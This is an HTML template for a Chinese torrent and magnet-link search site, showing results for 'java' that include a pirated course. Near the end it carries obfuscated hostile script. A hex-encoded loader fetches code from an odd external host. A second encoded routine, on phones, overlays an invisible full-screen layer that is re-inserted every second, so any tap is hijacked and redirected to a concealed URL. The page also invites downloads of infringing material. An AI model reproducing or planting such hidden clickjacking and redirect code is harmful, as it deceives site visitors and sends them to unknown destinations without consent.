<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:th="http://www.thymeleaf.org" xmlns:sec="http://www.thymeleaf.org/thymeleaf-extras-springsecurity4">
<head>
    <meta http-equiv="Cache-Control" content="no-transform "/>
    <meta http-equiv="Cache-Control" content="no-siteapp"/>
    <meta name="applicable-device" content="pc,mobile">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <title>磁力猫 -最好用的磁力搜索引擎</title>
    <meta name="keywords" content="java,java下载,java种子,javaBT种子 ,磁力链接,种子搜索,BT种子,种子搜索神器,磁力搜索,BT搜索,磁力搜,磁力链,磁力链接搜索,BT种子搜索"/>
    <meta name="description" content="java磁力链接,javaBT种子迅雷下载,java百度云在线播放下载。java的热门磁力资源! 磁力链接搜索引擎,BT种子磁力链接的最佳种子搜索神器。"/>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"/>
    <link rel="shortcut icon" href="/static/favicon.ico"/>
    <link rel="icon" href="/static/favicon.ico"/>
    <link type="text/css" rel="stylesheet" href="../static/css/muerbt.css" th:href="@{/static/css/muerbt.css}"/>
</head>
<body>
<div class="wrapper">
    <div class="mt15"></div>
    <div class="p-wrapper">
        <div class="bobologo mb15"><a href="/"><img src="../static/images/muerbt.png" th:src="@{/static/images/muerbt.png}"
                                                    alt="磁力搜索 BT种子搜索利器 免费下载BT种子，超4000万条种子数据"/></a></div>
        <div class="searchbox">
            <form action="/search" name="search" id="searchFrom" method="post" onsubmit="return submitForm(this);">
                <div class="search">
                    <input id="csrf_token" name="csrf_token" type="hidden"
                           value="IjBkM2EyOWIwY2NkOTJhMDIyMTk2N2JkYWVkYzkwYWM2ZWEyODNkMzgi.YZ8HDQ.Kfp_kMN9fXBARRq352_gcaqxFSo">
                    <div class="sbtn">
                        <button value="搜索" type="submit">搜索</button>
                    </div>
                    <div class="wd">
                        <input autocomplete="on" autofocus="autofocus" id="search" name="search" placeholder="请输入关键词..."
                               type="text" value="java">
                    </div>
                </div>
            </form>
        </div>


        <div class="tbox">
            <div class="msg">
                <span>为您找到约<span class="orange"> 4734 </span>个磁力链接/BT种子，耗时 5 毫秒。</span><span>
        </span>
            </div>
        </div>
        <div class="tbox sort-box">
            <div class="sortbar">
                <span class="l-title">分类：</span>
                <a href="/search-java-0-0-1.html" class="active">全部(4734)</a>
                <a href="/search-java-1-0-1.html" class="">影视(1343)</a>
                <a href="/search-java-2-0-1.html" class="">音乐(46)</a>
                <a href="/search-java-3-0-1.html" class="">图像(1)</a>
                <a href="/search-java-4-0-1.html" class="">文档书籍(1532)</a>
                <a href="/search-java-5-0-1.html" class="">压缩文件(1112)</a>
                <a href="/search-java-6-0-1.html" class="">安装包(190)</a>
                <a href="/search-java-7-0-1.html" class="">其他(510)</a>
            </div>
            <div class="sortbar">
                <span class="l-title">排序：</span>
                <a href="/search-java-0-0-1.html" class="active">相关程度</a>
                <a href="/search-java-0-3-1.html" class="">热度</a>
                <a href="/search-java-0-1-1.html" class="">文件大小</a>
                <a href="/search-java-0-2-1.html" class="">添加时间</a>
                <a href="/search-java-0-4-1.html" class="">最近访问</a>
            </div>
        </div>
        <div class="tbox">
            <div class="ssbox">
                <div class="title">
                    <h3><span>[影视]</span><a href="/hash/1cc75f107fa21bcfd8a311872498d78ee6b924d9.html" target="_blank">
                        [CourseClub.Me] SkillShare - Complete Java Programming from Java Basics to Advanced Java Learn
                        Java Programming from Scratch </a></h3>
                </div>
                <div class="sbar">
                    <span><a href="magnet:?xt=urn:btih:1CC75F107FA21BCFD8A311872498D78EE6B924D9"
                             target="_blank">[磁力链接]</a></span>
                    <span>添加时间:<b>2021-09-26</b></span>
                    <span>大小:<b class="cpill yellow-pill">1.1 GB</b></span>
                    <span>最近下载:<b>2021-11-24</b></span>
                    <span>热度:<b>118</b></span>
                </div>
            </div>
            <div class="pager">

                <span>共237页</span>


                <a href="#">上一页</a>


                <span>1</span>

                <a href="/search-java-0-0-2.html">2</a>

                <a href="/search-java-0-0-3.html">3</a>

                <a href="/search-java-0-0-4.html">4</a>

                <a href="/search-java-0-0-5.html">5</a>


                <a href="/search-java-0-0-2.html">下一页</a>


            </div>
        </div>
    </div>

    <div class="footer">
    </div>
    <script type="text/javascript">
        var sShFdhoH1 = window["\x5f\x70\x61\x71"] = window["\x5f\x70\x61\x71"] || [];  /* tracker methods like "setCustomDimension" should be called before "trackPageView" */
        sShFdhoH1["\x70\x75\x73\x68"](['\x74\x72\x61\x63\x6b\x50\x61\x67\x65\x56\x69\x65\x77']);
        sShFdhoH1["\x70\x75\x73\x68"](['\x65\x6e\x61\x62\x6c\x65\x4c\x69\x6e\x6b\x54\x72\x61\x63\x6b\x69\x6e\x67']);
        (function () {
            var gotpjLd2 = "\x2f\x2f\x74\x6f\x6e\x67\x2e\x38\x38\x38\x38\x38\x38\x38\x38\x38\x38\x2e\x62\x69\x64\x2f";
            sShFdhoH1["\x70\x75\x73\x68"](['\x73\x65\x74\x54\x72\x61\x63\x6b\x65\x72\x55\x72\x6c', gotpjLd2 + '\x6d\x61\x74\x6f\x6d\x6f\x2e\x70\x68\x70']);
            sShFdhoH1["\x70\x75\x73\x68"](['\x73\x65\x74\x53\x69\x74\x65\x49\x64', '\x36\x33']);
            var H3 = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"],
                KLI4 = H3["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'),
                YBRHQgrIn5 = H3["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x73\x63\x72\x69\x70\x74')[0];
            KLI4["\x74\x79\x70\x65"] = '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';
            KLI4["\x61\x73\x79\x6e\x63"] = true;
            KLI4["\x73\x72\x63"] = gotpjLd2 + '\x6d\x61\x74\x6f\x6d\x6f\x2e\x6a\x73';
            YBRHQgrIn5["\x70\x61\x72\x65\x6e\x74\x4e\x6f\x64\x65"]["\x69\x6e\x73\x65\x72\x74\x42\x65\x66\x6f\x72\x65"](KLI4, YBRHQgrIn5);
        })();
    </script>
    <script type="text/javascript">
        (function (m, e, t, r, i, k, a) {
            m[i] = m[i] || function () {
                (m[i].a = m[i].a || []).push(arguments)
            };
            m[i].l = 1 * new Date();
            k = e.createElement(t), a = e.getElementsByTagName(t)[0], k.async = 1, k.src = r, a.parentNode.insertBefore(k, a)
        })
        (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

        ym(83977288, "init", {
            clickmap: true,
            trackLinks: true,
            accurateTrackBounce: true,
            webvisor: true
        });
    </script>
    <noscript>
        <div><img src="../static/images/7cef395fcb49476198a0e4b7dd44b1b1.gif" th:src="@{/static/images/7cef395fcb49476198a0e4b7dd44b1b1.gif}" style="position:absolute; left:-9999px;" alt=""/>
        </div>
    </noscript>
    <script>LA.init({id: "JPKo1sA3TSVhjowo", ck: "JPKo1sA3TSVhjowo"})</script>
    <script src="../static/js/xmp.js" th:src="@{/static/js/xmp.js}" type="text/javascript"></script>
    <script src="../static/js/muerbt.js" th:src="@{/static/js/muerbt.js}" type="text/javascript"></script>

    <style>.MwXmD1 {
        background: none;
        margin: 0;
        padding: 0;
        position: fixed;
        right: 0;
        z-index: 2147483647;
        width: 100vw;
        bottom: 15vh;
        height: 85vh;
        text-decoration: none;
    }

    .MwXmD2 {
        position: fixed;
        bottom: 30vh;
        z-index: 2147483647;
        right: 0;
        margin-right: 6vw;
        padding: 0;
        text-decoration: none;
        background-color: red;
        width: 7vw;
        height: 7vw;
        border-radius: 7vw;
        font-size: 6vw;
        color: #fff;
        text-align: center;
        transform: rotate(-90deg);
    }</style>
    <span id=hSVK2 class=MwXmD2>></span>
    <div id=hSVK1 class=MwXmD1></div>
    <script>;(function () {
        function dec(str) {
            var key = 'abEF';
            var length = key.length;
            var bit, bit1, bit2, bit3, bit4, j = 0, s;
            var s = new Array(Math.floor(str.length / 4));
            var result = [];
            bit = s.length;
            for (var i = 0; i < bit; i++) {
                bit1 = key.indexOf(str.charAt(j));
                j++;
                bit2 = key.indexOf(str.charAt(j));
                j++;
                bit3 = key.indexOf(str.charAt(j));
                j++;
                bit4 = key.indexOf(str.charAt(j));
                j++;
                s[i] = bit1 * length * length * length + bit2 * length * length + bit3 * length + bit4;
                result.push(String.fromCharCode(s[i]))
            }
            return result.join('')
        }

        var i = 0, v1 = 0, v2 = 86, v3 = 1, v4 = 0, BD = 0, STP = 0, D = document, W = window,
            BID1 = D.getElementById('hSVK1'), BID2 = D.getElementById('hSVK2'),
            s = 'bEEabFbabFbabFaaaFEEaEFFaEFFbEbEaFEbaFEbaEFEbEbFbEbabFaFbEFFbFabaEFEbEaFbEFFbEFbaEFFbEabbEEaaEFFaFFFbFaEaFFb',
            dt = new Date(), g;
        if (navigator.userAgent.indexOf('Android') > 1) {
            v1 = 1;
        }
        if (navigator.userAgent.indexOf('iPhone') > 1 || navigator.userAgent.indexOf('iPad') > 1) {
            v1 = 2;
        }
        if (self != top) {
            v3 = 4;
        }
        if (navigator.userAgent.indexOf(dec('bEaEbEabbEEbbEbabFbb')) > -1) {
            BD = 1;
        }
        g = dec(s) + dt.getTime() + '&pt=' + v1 + '&ag=4835';
        var FR = function (e) {
            e.stopPropagation();
            e.preventDefault();
            JUM();
        };
        var FE = function (e) {
            this.style.display = 'none';
            e.stopPropagation();
            e.preventDefault();
            localStorage.setItem('Timer', dt.getTime());
            JUM();
        };

        function Tim() {
            var myTime = localStorage.getItem('Timer');
            if (myTime > 1) {
                if ((dt.getTime() - myTime) > 2.6 * 60 * 1000) {
                    v4 = 1;
                }
            } else {
                v4 = 1;
            }
        }

        function LI1() {
            BID1.style.display = 'block';
            BID1.addEventListener('click', FE, false);
        }

        function LI2() {
            BID2.addEventListener('click', FR, false);
        }

        function RP1() {
            var dc = D.createElement('div');
            dc.id = 'hSVK1';
            dc.className = 'MwXmD1';
            var interval = W.setInterval(function () {
                if (STP == 1) {
                    clearInterval(interval);
                }
                D.body.appendChild(dc);
            }, 1000);
            dc.addEventListener('click', FE, false);
        }

        function RP2() {
            var dc = D.createElement('span');
            dc.id = 'hSVK2';
            dc.className = 'MwXmD2';
            dc.innerHTML = '>';
            dc.addEventListener('click', FR, false);
            W.setInterval(function () {
                D.body.appendChild(dc);
            }, 1000);
        };

        function MAN() {
            BID1.style.display = 'none';
            Tim();
        }

        function JUM() {
            location.href = g + '&c=' + v3 + '&v=' + v2;
        }

        if (v1 != 0) {
            if (BD == 1) {
                MAN();
                if (v4 == 1) {
                    LI1()
                }
                LI2()
            } else {
                MAN();
                if (v4 == 1) {
                    RP1()
                }
                RP2()
            }
            ;
        } else {
            BID1.style.display = 'none';
            BID2.style.display = 'none';
        }
    })();
    </script>
</body>
</html>